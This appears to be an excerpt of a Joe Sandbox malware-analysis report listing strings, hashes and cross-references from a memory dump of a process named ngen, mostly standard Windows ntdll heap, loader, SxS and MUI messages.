                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 83778820685a3f389a110ab20fbef56d291045a9d736291f93255c6c4dec7d15
                                                • Instruction ID: b4b213a678036ca958917c1c1c0fe55844650c3300ed039f4dfed1d768a36faa
                                                • Opcode Fuzzy Hash: 83778820685a3f389a110ab20fbef56d291045a9d736291f93255c6c4dec7d15
                                                • Instruction Fuzzy Hash: BA816AB1A40348AFDB20CF99C945BAEBBF9BB48714F10411AEA09F7240D3B5AD40DF60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                • API String ID: 0-3063724069
                                                • Opcode ID: 9d884acd40f7fa103b846e3194645b7712717091e418bdea7e63dace952ecf0f
                                                • Instruction ID: 830c8f9ec133a092b3e5e93c57731baecc3d87c36fa0305997e40d6f3b0f6333
                                                • Opcode Fuzzy Hash: 9d884acd40f7fa103b846e3194645b7712717091e418bdea7e63dace952ecf0f
                                                • Instruction Fuzzy Hash: 21D1F172908329AFD722DB54C854B6BB7ECAF84B54F044929FE84E7250D770DD0487E6
                                                Strings
                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0587D262
                                                • @, xrefs: 0587D2AF
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0587D2C3
                                                • @, xrefs: 0587D0FD
                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0587D146
                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 0587D196
                                                • @, xrefs: 0587D313
                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0587D0CF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                • API String ID: 0-1356375266
                                                • Opcode ID: b9b154ca2dc177de992f70a710fdc74873d7d0cfd975fa745c174af45e9fd5fe
                                                • Instruction ID: 2011eb31347d4fd794275e94e89b74e1426b76fc15ee4d8bc142e237f6fd640b
                                                • Opcode Fuzzy Hash: b9b154ca2dc177de992f70a710fdc74873d7d0cfd975fa745c174af45e9fd5fe
                                                • Instruction Fuzzy Hash: EAA15771A093099FD721DE24C484B6BFBE9BF84715F00492EE999D6240E774DD08CBA3
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 0-1745908468
                                                Strings
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 058D9A01
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058D9A11, 058D9A3A
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058D99ED
                                                • LdrpInitShimEngine, xrefs: 058D99F4, 058D9A07, 058D9A30
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 058D9A2A
                                                • apphelp.dll, xrefs: 05876496
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 058F8181, 058F81F5
                                                • Loading import redirection DLL: '%wZ', xrefs: 058F8170
                                                • LdrpInitializeProcess, xrefs: 058BC6C4
                                                • LdrpInitializeImportRedirection, xrefs: 058F8177, 058F81EB
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058BC6C3
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 058F81E5
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                Strings
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 058F2180
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 058F2178
                                                • SXS: %s() passed the empty activation context, xrefs: 058F2165
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058F21BF
                                                • RtlGetAssemblyStorageRoot, xrefs: 058F2160, 058F219A, 058F21BA
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 058F219F
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058F02E7
                                                • RTL: Re-Waiting, xrefs: 058F031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058F02BD
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 058A527B
                                                • Kernel-MUI-Language-Disallowed, xrefs: 058A5352
                                                • Kernel-MUI-Number-Allowed, xrefs: 058A5247
                                                • WindowsExcludedProcs, xrefs: 058A522A
                                                • Kernel-MUI-Language-SKU, xrefs: 058A542B
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1975516107
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-3570731704
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                Strings
                                                • @, xrefs: 058B8591
                                                • LdrpInitializeProcess, xrefs: 058B8422
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058B8421
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 058B855E
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                Strings
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058F21D9, 058F22B1
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058F22B6
                                                • SXS: %s() passed the empty activation context, xrefs: 058F21DE
                                                • .Local, xrefs: 058B28D8
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058E10AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 058E106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 058E1028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 058E0FE5
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 0-2586055223
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 0-336120773
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 058EA992
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058EA9A2
                                                • LdrpDynamicShimModule, xrefs: 058EA998
                                                • apphelp.dll, xrefs: 058A2462
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $0
                                                • API String ID: 0-3352262554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 05881712
                                                • HEAP: , xrefs: 05881596
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05881728
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                • API String ID: 0-373624363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %$&$@
                                                • API String ID: 0-1537733988
                                                Strings
                                                • GlobalizationUserSettings, xrefs: 0595B834
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0595B82A
                                                • TargetNtPath, xrefs: 0595B82F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 058DE6A6
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 058DE6C6
                                                • HEAP: , xrefs: 058DE6B3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                Strings
                                                • minkernel\ntdll\ldrmap.c, xrefs: 058EA59A
                                                • LdrpCompleteMapModule, xrefs: 058EA590
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 058EA589
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                Strings
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 058F82DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058F82E8
                                                • Failed to reallocate the system dirs string !, xrefs: 058F82D7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                • API String ID: 0-1151232445
                                                Strings
                                                • minkernel\ntdll\ldrtls.c, xrefs: 058F1B4A
                                                • LdrpAllocateTls, xrefs: 058F1B40
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 058F1B39
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                Strings
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0593C1C5
                                                • @, xrefs: 0593C1F1
                                                • PreferredUILanguages, xrefs: 0593C212
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 05904899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05904888
                                                • LdrpCheckRedirection, xrefs: 0590488F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                Strings
                                                • RtlCreateActivationContext, xrefs: 058F29F9
                                                • SXS: %s() passed the empty activation context data, xrefs: 058F29FE
                                                • Actx , xrefs: 058B33AC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                • API String ID: 0-859632880
                                                Strings
                                                • @, xrefs: 0590B670
                                                • GlobalFlag, xrefs: 0590B68F
                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0590B632
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                • API String ID: 0-4192008846
                                                Strings
                                                • LdrpInitializeTls, xrefs: 058F1A47
                                                • minkernel\ntdll\ldrtls.c, xrefs: 058F1A51
                                                • DLL "%wZ" has TLS information at %p, xrefs: 058F1A40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-931879808
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 05902104
                                                • LdrpInitializationFailure, xrefs: 059020FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 059020F3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: df7b40ae5c25b7cec68072231f485d8e31b1dcb1a17578a9b9d912589ea6aeee
                                                • Instruction ID: 9f0e6e4d10bc5a9fce090ead9893f46305ffc189a4cf089adf85c9f3caec8fec
                                                • Opcode Fuzzy Hash: df7b40ae5c25b7cec68072231f485d8e31b1dcb1a17578a9b9d912589ea6aeee
                                                • Instruction Fuzzy Hash: 74F0F434640308AFDB14E60CCD4BFA93BACEB40A54F440495FA00AB281D6B4A900DA91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 6db1e33e61e60442d77dffe70bd5044f8aefe0c04162db9ba64b48e4cccaed4f
                                                • Instruction ID: 58d77152bb2309fbcea8365aa13916cb22c2509e9c1b8f81a8143c3560405e48
                                                • Opcode Fuzzy Hash: 6db1e33e61e60442d77dffe70bd5044f8aefe0c04162db9ba64b48e4cccaed4f
                                                • Instruction Fuzzy Hash: 3A614A71E143089FDB64DFA89845BAEBBB9FB48704F14406DEA49EB261D731ED40CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$
                                                • API String ID: 0-233714265
                                                • Opcode ID: 233d49d32a852d145fe3533b01ffe7ae75855456fffae08ab9b56978dd23e372
                                                • Instruction ID: a27fae7d620a0c3be86e3186e4048fc29f7707faa2d3d0cb5e9d07e34d82c9c1
                                                • Opcode Fuzzy Hash: 233d49d32a852d145fe3533b01ffe7ae75855456fffae08ab9b56978dd23e372
                                                • Instruction Fuzzy Hash: 8E61E271A0474ADBDF29DF68C585BACB7B2FF44308F184029DA15EB240DB74AD81CB81
                                                Strings
                                                • kLsE, xrefs: 05880540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0588063D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: f3f993060b1703c30fece8c9b242bf73e05f3b18f450a5f70c4dd16c76eeb897
                                                • Instruction ID: c4f8d9e4760b3054c8f4f02e782565a1cdea48fccaeeda1bf3bd4d633afe79e0
                                                • Opcode Fuzzy Hash: f3f993060b1703c30fece8c9b242bf73e05f3b18f450a5f70c4dd16c76eeb897
                                                • Instruction Fuzzy Hash: FB516B71604746CBC724EF69C548AB7B7E5FF84304F04483EE99AC7240E7749949CBA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                • API String ID: 0-118005554
                                                • Opcode ID: 9a24d410b88a51a33a1b021fefaee279f90ae88bf59f6240cd0db059288bfec9
                                                • Instruction ID: 6241b984c54cbcf2b11cabf1f654a0d6f2ff84c648a6a8f9e3e66dd04b29f800
                                                • Opcode Fuzzy Hash: 9a24d410b88a51a33a1b021fefaee279f90ae88bf59f6240cd0db059288bfec9
                                                • Instruction Fuzzy Hash: 55319C322087599BD311DB28D859B2AB7F8FF84790F080C69FC95CB390EA34D905CB96
                                                Strings
                                                • RtlpInitializeAssemblyStorageMap, xrefs: 058F2A90
                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 058F2A95
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                • API String ID: 0-2653619699
                                                • Opcode ID: b3a80d5cc4173623ab83db792929040cfba44cd95ac5d8ea59ff98503c169420
                                                • Instruction ID: 5fd0e154fede7bce62095538717911170ffa68634bc81cf6e3ffdd6a6c4b7825
                                                • Opcode Fuzzy Hash: b3a80d5cc4173623ab83db792929040cfba44cd95ac5d8ea59ff98503c169420
                                                • Instruction Fuzzy Hash: 75112C71704204BBFB36CA4C8D41FAF76ADEB94B54F1880297E05DB344D6B5CD0083A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 94eebf268af24d1549aac170d8ac72a92997bdacb8f1495755db70f85375305b
                                                • Instruction ID: 202f51158c869a75c14b9cb57a58bf9cd9d3cf269ff73c2ba7ae5311dc597761
